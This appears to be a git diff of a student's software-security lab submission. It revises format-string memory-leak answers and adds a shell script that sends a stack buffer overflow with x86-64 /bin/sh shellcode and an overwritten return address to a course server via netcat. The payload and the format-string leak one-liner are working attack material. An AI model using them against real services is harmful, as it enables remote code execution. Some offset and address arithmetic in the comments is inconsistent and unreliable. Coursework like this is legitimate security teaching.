poging

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
index 95b7f60..9c98cf3 100644 (file)
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
@@ -1,12 +1,14 @@
-a.     The buffer is 104 characters long. When you input 105 a's the last a will
-be garbled.
+a)
+The buffer is probably 104 characters wide. All characters over 104 will not be
+echoed.
 
-b.     "%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx"
-The memory outputted is this:  
-7ffff7ff805b
+b,c)
+printf "%20s\n" | sed 's/ /%lx /g' | nc hackme.cs.ru.nl 2266
+
+Memory:
+7ffff7ff8050
 7ffff7dd8de0
 fbad2088
-786c2520786c2520
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
@@ -19,15 +21,8 @@ fbad2088
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
-786c25
-1
+7fffffffeb00           saved frame pointer
+4004c1                 return address
+1                      return value
 7fffffffeb30
 7fffffffebc0
-4006a9
-0
-100400530
-
-c.     Frame pointer: 7fffffffeb30 or 7fffffffebc0
-       return address: 4006a9
-
-d.     17 words of 8 bytes therefore 136

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
new file mode 100644 (file)
index 0000000..38ea879
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
@@ -0,0 +1,14 @@
+# Buffer is 104 bytes
+# Shell code is 30 bytes so we need to fill 73 bytes
+# Then we need to skip the sfp and fix the return address to our address
+
+#fillers=$(printf "%73s")
+#fillers="a\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f"
+fillers="\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f"
+shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+sfpfiller="\x01\x01\x01\x01\x01\x01"
+# Return value is
+# 0x7ffff7dd8de0 - 73 = 7ffff7dd8e29 -
+# The buffer 
+returnvalue="\x7f\xff\xf7\xdd\xeb\x30"
+cat <(echo -e "${fillers}${shellcode}${sfpfiller}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266